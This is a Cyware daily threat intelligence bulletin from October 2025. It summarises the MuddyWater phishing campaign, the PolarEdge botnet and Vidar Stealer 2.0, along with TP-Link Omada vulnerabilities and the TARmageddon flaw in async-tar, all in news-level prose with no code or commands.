Cyware Daily Threat Intelligence, October 22, 2025

A sophisticated phishing campaign by the Iran-linked group MuddyWater has targeted over 100 government entities across the Middle East and North Africa. The attackers used a compromised email account to distribute Word documents that, when opened, deployed the Phoenix backdoor. This gave the group persistent access to the victims' systems.

A new and improved version of the Vidar Stealer malware has been released, now completely rewritten in C for better performance and evasion. Dubbed Vidar Stealer 2.0, this potent malware specializes in stealing sensitive data from infected machines. It then sends the stolen information to the attackers via platforms like Telegram.

A critical vulnerability named TARmageddon has been discovered in the async-tar Rust library and its forks. This high-severity flaw can allow attackers to overwrite files on a target system during the extraction of a malicious TAR archive. The vulnerability poses a significant risk as it could lead to remote code execution.

Top Malware Reported in the Last 24 Hours

MuddyWater's sophisticated phishing campaign

Group-IB revealed a sophisticated phishing campaign orchestrated by the Iran-linked APT group MuddyWater, targeting over 100 governmental entities in the Middle East and North Africa. The attackers accessed a compromised email account through NordVPN and sent phishing emails containing Microsoft Word attachments that prompted recipients to enable macros. When macros were activated, malicious VBA code executed, deploying the Phoenix backdoor v4, which allowed persistent access to the attackers. This operation utilized the FakeUpdate injector and a custom credential-stealing tool disguised as a calculator application. 

PolarEdge botnet targets popular routers

PolarEdge is a sophisticated botnet malware that targets routers from Cisco, ASUS, QNAP, and Synology to form a malicious network. It exploits vulnerabilities, including CVE-2023-20118, to install a backdoor that communicates with a command-and-control server via TLS. This backdoor is capable of executing commands and modifying its configuration in real-time while employing various anti-analysis techniques to avoid detection. PolarEdge operates in two modes: a connect-back mode for file downloads and a debug mode for interactive adjustments. Additionally, it disguises its processes to evade security measures. 

Meet Vidar Stealer 2.0

Vidar Stealer 2.0 has emerged with significant upgrades, including a complete rewrite in C and support for multi-threaded data theft, enhancing its performance and reducing detection risks. This malware specializes in stealing sensitive information from various applications, targeting browser cookies, cryptocurrency wallets, and cloud credentials. Notably, it bypasses Chrome's App-Bound encryption through advanced techniques like memory injection and direct code execution in active browser processes. Once it collects the data, Vidar 2.0 captures screenshots and transmits the stolen information to designated delivery points, such as Telegram bots and URLs on Steam profiles.

Top Vulnerabilities Reported in the Last 24 Hours

TP-Link patches multiple bugs

TP-Link has released security updates addressing four vulnerabilities in its Omada gateway devices, two of which are critical and allow for remote code execution. The vulnerabilities, identified as CVE-2025-6541 and CVE-2025-6542, can be exploited by attackers to execute arbitrary commands on the devices. Additional vulnerabilities include CVE-2025-7850, which requires administrator access, and CVE-2025-7851, related to improper privilege management. Affected models include ER8411, ER7412-M2, ER707-M2, and several others, each with specified firmware versions. 

TARmageddon flaw exposes async-tar vulnerability

A critical vulnerability, named "TARmageddon," has been discovered in the async-tar Rust library and its forks, including tokio-tar, potentially allowing remote code execution through file overwriting attacks. This flaw, tracked as CVE-2025-62518 with a CVSS score of 8.1, results from inconsistent handling of PAX extended headers and ustar headers within TAR files. Attackers can exploit this inconsistency to smuggle additional archive entries, leading to the possibility of overwriting files during extraction. The tokio-tar library, which is essentially abandoned, has not been updated since July 2023, raising concerns for users relying on it.